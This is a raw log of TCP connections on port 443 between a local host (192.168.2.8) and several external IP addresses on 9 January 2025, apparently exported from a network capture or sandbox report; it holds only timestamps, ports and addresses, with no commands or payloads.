Jan 9, 2025 14:42:37.742413044 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:37.742604017 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:37.742629051 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:37.752365112 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:37.752407074 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:37.752531052 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:37.753549099 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:37.753568888 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.376446962 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.377168894 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.377193928 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.380192995 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.381268978 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.381268978 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.381372929 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.381468058 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.381480932 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.384243965 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.385615110 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.385627985 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.386738062 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.386790037 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.388221025 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.388286114 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.388678074 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.388688087 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.477171898 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.489468098 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.489640951 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.489702940 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.490628958 CET	49777	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.490653992 CET	443	49777	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.497134924 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.508193970 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.528073072 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.528089046 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.529192924 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.529253006 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.531790972 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.531827927 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.531889915 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.536020041 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.536248922 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.537010908 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:38.537035942 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:38.539186001 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.539194107 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.539248943 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.539287090 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.555176973 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.555265903 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.555330992 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.557162046 CET	49776	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:38.557177067 CET	443	49776	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:38.673363924 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.728494883 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.729715109 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.729773998 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.729876995 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.729896069 CET	443	49775	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:38.729907036 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.729937077 CET	49775	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:38.881520033 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:38.881542921 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:38.881901979 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:38.882080078 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:38.882108927 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:38.882577896 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:38.882683992 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:38.882720947 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:38.882776022 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:38.884682894 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:38.884774923 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:38.884845018 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:38.886487961 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:38.886502981 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:38.887547016 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:38.887558937 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:38.887830973 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:38.887845993 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:38.895152092 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:38.895180941 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:38.995898008 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:38.995919943 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:38.996001005 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:38.996289968 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:38.996309042 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:39.119287968 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.120402098 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:39.120413065 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.120748043 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.121094942 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:39.121155977 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.121577978 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:39.163345098 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.237822056 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.237911940 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.237976074 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:39.283545017 CET	49787	443	192.168.2.8	3.171.139.66
Jan 9, 2025 14:42:39.283591986 CET	443	49787	3.171.139.66	192.168.2.8
Jan 9, 2025 14:42:39.341183901 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:39.341264009 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:39.341413975 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:39.342699051 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:39.342714071 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:39.345089912 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.345439911 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.345448971 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.346486092 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.346565962 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.347933054 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:39.347945929 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:39.348063946 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:39.348701954 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:39.348716974 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:39.349642992 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.349716902 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.364094973 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.364336014 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.364357948 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.367660999 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.367731094 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.368218899 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.368400097 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.373579979 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:39.373600960 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:39.373709917 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:39.373871088 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:39.373887062 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:39.449748039 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:39.450349092 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:39.450356007 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:39.451828957 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:39.451916933 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:39.454130888 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:39.454267025 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:39.471479893 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.471493959 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.471498966 CET	443	49796	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.471514940 CET	443	49795	104.126.116.98	192.168.2.8
Jan 9, 2025 14:42:39.486332893 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.487103939 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.488169909 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.488178015 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.488307953 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.488317966 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.489445925 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.489516020 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.489672899 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.489727020 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.492156029 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.492240906 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.492263079 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.492331982 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.504081964 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:39.504087925 CET	443	49800	104.126.116.65	192.168.2.8
Jan 9, 2025 14:42:39.603996992 CET	49800	443	192.168.2.8	104.126.116.65
Jan 9, 2025 14:42:39.669312000 CET	49796	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.669332981 CET	49795	443	192.168.2.8	104.126.116.98
Jan 9, 2025 14:42:39.669435024 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.669445992 CET	443	49798	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.669595957 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.669620037 CET	443	49793	204.79.197.219	192.168.2.8
Jan 9, 2025 14:42:39.778714895 CET	49798	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.778872013 CET	49793	443	192.168.2.8	204.79.197.219
Jan 9, 2025 14:42:39.964948893 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:39.965269089 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:39.965290070 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:39.966439962 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:39.966833115 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:39.967005014 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:39.967073917 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:40.007330894 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:40.015428066 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.015964031 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.015997887 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.016469955 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.016940117 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.017041922 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.017291069 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.017355919 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.017393112 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.059171915 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.059633017 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.059644938 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.060019016 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.060445070 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.060509920 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.060655117 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.060749054 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.060789108 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.110043049 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.110094070 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.110168934 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.110784054 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.110796928 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.130510092 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:40.130755901 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:40.130875111 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:40.134094000 CET	49803	443	192.168.2.8	20.110.205.119
Jan 9, 2025 14:42:40.134109020 CET	443	49803	20.110.205.119	192.168.2.8
Jan 9, 2025 14:42:40.238795996 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.238886118 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.238976955 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.239577055 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.239660025 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.239725113 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.244867086 CET	49802	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.244875908 CET	443	49802	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.246100903 CET	49801	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.246135950 CET	443	49801	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.345822096 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.345884085 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.346857071 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.347251892 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.347289085 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.798932076 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.799303055 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.799321890 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.799895048 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.800218105 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.800324917 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.800499916 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.800559998 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.800575018 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.942008972 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.942105055 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:40.942298889 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.946403027 CET	49804	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:40.946418047 CET	443	49804	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.045948982 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.057768106 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:41.057790995 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.058243990 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.059055090 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:41.059137106 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.059726954 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:41.059772968 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:41.059822083 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.206147909 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.206238985 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:41.206294060 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:41.206938982 CET	49805	443	192.168.2.8	13.89.178.27
Jan 9, 2025 14:42:41.206983089 CET	443	49805	13.89.178.27	192.168.2.8
Jan 9, 2025 14:42:42.276004076 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:42:42.276038885 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:42:42.276051998 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:42:42.276087999 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:42:42.276112080 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:42:42.279053926 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:42:42.283807039 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:42:50.448713064 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.448760986 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.448928118 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.449249983 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.449261904 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.923952103 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.924042940 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.925726891 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.925734997 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.926002026 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.926894903 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.927714109 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.927745104 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.927850962 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.927881002 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.927984953 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.928002119 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.928123951 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.928147078 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.928311110 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.928333998 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.928487062 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.928514004 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.928520918 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.928654909 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.928674936 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.938152075 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.938293934 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.938333035 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.938339949 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.938344955 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.938357115 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.938493013 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.938529015 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.938561916 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.943443060 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.943650961 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.943670034 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:50.943691015 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.943718910 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.943733931 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:50.947249889 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.025222063 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:52.025314093 CET	443	49769	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:52.025381088 CET	49769	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:52.113997936 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.114059925 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.114207983 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.114459038 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.114476919 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.114514112 CET	49811	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.114521027 CET	443	49811	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.303215981 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.303257942 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.303339958 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.305280924 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.305306911 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.684498072 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.684550047 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.684664011 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.685717106 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.685734034 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.762662888 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.762733936 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.764655113 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.764668941 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.764909029 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:52.765805960 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.765805960 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:52.765831947 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.068861008 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.068931103 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.069097996 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.069097996 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.069618940 CET	49812	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.069633961 CET	443	49812	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.147432089 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.147495985 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.149048090 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.149060011 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.149308920 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.196557045 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.221623898 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.221674919 CET	49813	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.221702099 CET	443	49813	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.225025892 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.225065947 CET	443	49814	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:53.225636959 CET	49814	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:53.225636959 CET	49814	443	192.168.2.8	172.67.174.91
